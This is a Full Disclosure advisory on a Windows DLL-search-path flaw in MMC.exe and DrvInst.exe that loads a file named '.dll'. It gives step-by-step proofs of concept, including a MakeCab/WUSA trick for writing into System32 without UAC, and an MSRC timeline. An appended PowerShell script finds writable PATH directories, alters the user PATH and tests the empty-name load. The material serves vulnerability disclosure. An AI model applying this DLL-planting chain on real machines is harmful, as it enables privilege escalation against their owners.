Hi @ll, on Windows 7 (I did not check other versions of Windows, but I'm confident that the underlying bug is present in Windows Vista, Windows Server 2008 [R2], Windows 8[.1] and Windows Server 2012 [R2], i.e. all versions of Windows NT6.x too) the system utilities MMC.exe and DrvInst.exe load and execute a DLL named ".dll", resulting in escalation of privilege.
Since no system DLL by the name ".dll" exists it is loaded via the DLL search path (see <https://msdn.microsoft.com/en-us/library/ms682586.aspx>).

Proof of concept for MMC.exe:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1. download <http://home.arcor.de/skanthak/download/SENTINEL.DLL> (see <http://home.arcor.de/skanthak/sentinel.html> for details) and save it as .DLL ['] in an arbitrary directory of your choice;

2. add this directory to the user's (not the system's) PATH [²];

3. download the current Realtek PCIexpress ethernet NIC driver from <http://12244.wpc.azureedge.net/8012244/drivers/rtdrivers/cn/nic/0012-Install_Win7_7097_11232015.zip> (via <http://www.realtek.com/downloads/>);

4. open the downloaded 0012-Install_Win7_7097_11232015.zip and extract the contents of the "directory" Install_Win7_7097_11232015\WIN7\32 from the .ZIP to an(other) arbitrary directory of your choice;

5. start device manager (i.e. MMC.exe DevMgmt.msc) [³] and install the Realtek ethernet NIC driver from the directory chosen in step 4;

6. see the message box displayed from DllMain() of the loaded .DLL [']

Proof of concept for DrvInst.exe:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1. download <http://home.arcor.de/skanthak/download/SENTINEL.DLL> (see <http://home.arcor.de/skanthak/sentinel.html> for details) and save it as .DLL ['] in an arbitrary directory of your choice;

2a. add this directory to the system's PATH (yes, this requires administrative privileges [³]);

OR

2b. run the following 2 commands to "copy" the downloaded .DLL to %SystemRoot%\System32 (yes, this requires administrative privileges [³]):

    MakeCab.exe .DLL "%TEMP%\dummy.cab"
    WUSA.exe "%TEMP%\dummy.cab" /Extract:%SystemRoot%\System32

3. download the Realtek card reader driver from <http://global-download.acer.com/GDFiles/Driver/CardReader/CardReader_Realtek_6.3.9600.21257_W7x64_A.zip> (via <http://support.acer.com/downloads/>);

4. open the downloaded CardReader_Realtek_6.3.9600.21257_W7x64_A.zip and extract the contents of the "directory" CardReader_Realtek_6.3.9600.21257_W7x64\DrvBin32 from the .ZIP to an(other) arbitrary directory of your choice;

5. start device manager (i.e. MMC.exe DevMgmt.msc) [³] and install the Realtek card reader driver from the directory chosen in step 4;

6. start event viewer (i.e. MMC.exe EventVwr.msc) [³] and find the event log entry from source "Vulnerability and Exploit Detector" generated from DllMain() of the loaded .DLL ['] (DrvInst.exe runs in the non-interactive "session 0", so SENTINEL.DLL doesn't display a message box and writes an event log entry only).

stay tuned
Stefan Kanthak

['] yes, that's a valid Win32 filename; a DLL named ".dll" is loaded via the following (obviously erroneous) calls of Win32 API functions:
    * LoadLibraryA(""),
    * LoadLibraryA(L"<arbitrary UNICODE string>"),
    * LoadLibraryW(L""),
    * LoadLibraryExA("", ...),
    * LoadLibraryExA(L"<arbitrary UNICODE string>", ...),
    * LoadLibraryExW(L"", ...)
    The most probable cause is feeding a UNICODE string to the ANSI functions.
    This bug may be triggered via other execution paths in MMC.exe, via installation of other drivers or via other .MSC too!

    PS: %SystemRoot%\System32\WBEM\WMIPrvSE.exe and SysInternals VMMap.exe show this bug too!

[²] of course the system's PATH may be used instead, or the method shown in step 2b. of the DrvInst.exe exploit.

[³] in Windows' default configuration this does NOT trigger the user account control!

Timeline:
~~~~~~~~~

2015-12-04 vulnerability reports sent to MSRC
2015-12-04 response from MSRC regarding DrvInst.exe: "unauthenticated users can't change path" and "for WUSA.exe to work you require the system to be configured by the user in a non-default manner"
2015-12-04 OUCH! sent to MSRC: WUSA.exe <.CAB archive> /Extract:<destination directory> works in DEFAULT configuration of Windows 7, Windows Server 2008 R2, Windows 8[.1] and Windows Server 2012 [R2]
2015-12-04 response from MSRC regarding MMC.exe: "unauthenticated users can't change path"
2015-12-05 OUCH! sent to MSRC: users can change their own PATH, and user's PATH is appended to the system's PATH
2015-12-05 response from MSRC: this does not meet the bar for security servicing.
2015-12-05 report published

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
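The two preconditions the advisory relies on, a PATH directory the user can write to (step 2 of both proofs of concept, and the point argued with MSRC in the timeline) and the loader resolving an empty name to ".dll" (the erroneous calls listed in footnote [']), can be checked on a given box with the following PowerShell. This is an added example, not code from Stefan Kanthak or from the advisory; it assumes Windows PowerShell 5.x on Windows 7 or later, run as a standard user. The function names, the scratch directory and the use of a copy of version.dll as a harmless stand-in for SENTINEL.DLL are this example's own choices.

```powershell
# Added example, not part of the advisory. Assumptions: Windows PowerShell 5.x
# on Windows 7 or later, run as a standard user. Function names, the scratch
# directory and the choice of version.dll as a harmless stand-in for
# SENTINEL.DLL are this example's own.

function Get-WritablePathDirs {
    # Every directory on the process PATH is a DLL search location (searched
    # last, after the application directory, System32, System, Windows and the
    # current directory). A writable one lets a standard user plant ".dll"
    # without touching %SystemRoot%\System32.
    param([string]$Path = $env:Path)
    foreach ($dir in ($Path -split ';' | Where-Object { $_ })) {
        if (-not (Test-Path -LiteralPath $dir -PathType Container)) { continue }
        $probe = Join-Path $dir ([IO.Path]::GetRandomFileName())
        try {
            [IO.File]::WriteAllBytes($probe, [byte[]]@())   # throws if not writable
            Remove-Item -LiteralPath $probe -Force
            $writable = $true
        } catch {
            $writable = $false
        }
        [pscustomobject]@{ Directory = $dir; Writable = $writable }
    }
}

function Add-UserPathDir {
    # The user's PATH is appended to the system's PATH when the environment is
    # built, so a directory added here reaches the search path of every process
    # started afterwards; no administrative privileges are required.
    param([Parameter(Mandatory)][string]$Dir)
    $user = [Environment]::GetEnvironmentVariable('Path', 'User')
    if (($user -split ';') -notcontains $Dir) {
        $new = (@($user, $Dir) | Where-Object { $_ }) -join ';'
        [Environment]::SetEnvironmentVariable('Path', $new, 'User')
    }
}

Add-Type -Namespace Advisory -Name Native -MemberDefinition @'
[DllImport("kernel32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern IntPtr LoadLibraryA(string lpFileName);
[DllImport("kernel32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
public static extern IntPtr LoadLibraryW(string lpFileName);
[DllImport("kernel32.dll")]
public static extern bool FreeLibrary(IntPtr hModule);
'@

function Test-EmptyNameLoad {
    # Stages "<Dir>\.dll", prepends <Dir> to this process's PATH and issues the
    # erroneous empty-name calls from footnote [']. Returns one record per call
    # saying whether the loader resolved the empty name to our ".dll".
    param([string]$Dir = (Join-Path $env:TEMP 'dotdll-poc'))
    New-Item -ItemType Directory -Path $Dir -Force | Out-Null
    # Any valid DLL of the right bitness works; the file name is what matters.
    Copy-Item -LiteralPath "$env:SystemRoot\System32\version.dll" `
              -Destination (Join-Path $Dir '.dll') -Force
    $env:Path = "$Dir;$env:Path"
    foreach ($call in 'LoadLibraryA', 'LoadLibraryW') {
        $h   = [Advisory.Native].GetMethod($call).Invoke($null, [object[]]@(''))
        $err = [Runtime.InteropServices.Marshal]::GetLastWin32Error()
        $hit = [Diagnostics.Process]::GetCurrentProcess().Modules |
               Where-Object { $_.ModuleName -eq '.dll' } | Select-Object -First 1
        $loaded = if ($hit) { $hit.FileName } else { $null }
        [pscustomobject]@{
            Call      = "$call(`"`")"
            Handle    = $h
            LastError = $err
            Loaded    = $loaded
        }
        if ($h -ne [IntPtr]::Zero) { [Advisory.Native]::FreeLibrary($h) | Out-Null }
    }
}

# Usage, as a standard user:
#   Get-WritablePathDirs | Where-Object Writable
#   Test-EmptyNameLoad | Format-Table -AutoSize
```

Get-WritablePathDirs answers MSRC's "unauthenticated users can't change path" for the machine at hand: any entry it reports as writable is a drop point without changing PATH at all, and Add-UserPathDir shows how a standard user adds one otherwise. Test-EmptyNameLoad only exercises the loader inside the PowerShell process; to see the privilege escalation itself, replace the staged copy of version.dll with SENTINEL.DLL and go through the MMC.exe or DrvInst.exe steps above.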